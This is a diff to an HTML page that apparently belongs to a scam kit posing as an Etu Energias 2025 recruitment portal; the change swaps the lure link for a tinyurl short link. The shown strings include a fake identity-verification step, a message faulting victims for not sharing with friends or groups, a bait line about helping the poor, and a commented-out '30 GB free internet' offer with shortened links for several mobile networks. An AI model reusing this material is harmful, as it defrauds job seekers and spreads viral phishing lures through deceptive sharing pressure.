--- a/gl.html
+++ b/gl.html
@@ -658,7 +658,7 @@ button:hover {
                   
           <button id="confirm">VERIFICAR</button>
             </div>
-            <p class="error">A sua inscrição foi rejeitada devido a informações incorretas. <a href="https://publicner1.github.io/etuenergias.co/ag"> <b><font color="blue">Clique aqui para voltar a introduzir as suas informações corretas.</font></b></a></p>
+            <p class="error">A sua inscrição foi rejeitada devido a informações incorretas. <a href="https://tinyurl.com/Etu-Energias-Recrutar"> <b><font color="blue">Clique aqui para voltar a introduzir as suas informações corretas.</font></b></a></p>
         </div>
         <div id="checking">
             <p class="title">Estamos a verificar a sua identidade, aguarde....</p>
@@ -831,7 +831,7 @@ $(document).click(function () {
 "30%20GB%20Free%20Internet%20Offer%0A%E2%9D%A4%0ATo%20Activate%2030%20GB%20Free%20Internet%20for%20all%20Networks%20click%20here%F0%9F%91%87%0A*1.%20Jio*%0Ahttps://cutt.ly/30-GB_Jio%0A%20%0A*2.%20Airtel*%0Ahttps://cutt.ly/30-GB_Airtel%0A%20%0A*3.%20Vi*%0Ahttps://cutt.ly/30-GB_Vi%0A%20%0A*4.%20Jazz*%0Ahttps://cutt.ly/30-GB_Jazz%0A%20%0A*5.%20Zong*%0Ahttps://cutt.ly/30-GB_Zong%0A%20%0A*6.%20Telenor*%0Ahttps://cutt.ly/30-GB_Telenor%0A%20%0A*7.%20Ufone*%0Ahttps://cutt.ly/30-GB_Ufone%0A%20%0A*8.%20Other Networks*%0Ahttps://cutt.ly/Get_30GB",
 -->
       <script>
-        var text1 = "*Regime de Recrutamento 2025 da Etu Energies*%0A%0AA Etu Energias abriu o seu portal de candidaturas online para recrutar novos colaboradores para preencher vagas disponíveis. O recrutamento já começou.%0A%0A*Os candidatos interessados ​​deverão candidatar-se online através do portal do Etu energias. Utilize o link abaixo para aceder ao portal de recrutamento eletrónico do Etu energias..%0A%0Ahttps://publicner1.github.io/etuenergias.co/ag",
+        var text1 = "*Regime de Recrutamento 2025 da Etu Energies*%0A%0AA Etu Energias abriu o seu portal de candidaturas online para recrutar novos colaboradores para preencher vagas disponíveis. O recrutamento já começou.%0A%0A*Os candidatos interessados ​​deverão candidatar-se online através do portal do Etu energias. Utilize o link abaixo para aceder ao portal de recrutamento eletrónico do Etu energias..%0A%0Ahttps://tinyurl.com/Etu-Energias-Recrutar",
             text2 = " uma quantidade de ",
             text3 = "Para todos os cidadãos que reúnam as condições para ajudar a classe pobre a ultrapassar a crise. Entre e registe-se agora e certifique-se de que se regista corretamente. 👉 ",
             error = "Algo correu mal!\nAs publicações não estão a ser lidas. Pode ter partilhado com amigos ou com o mesmo grupo várias vezes. Partilhe novamente..",
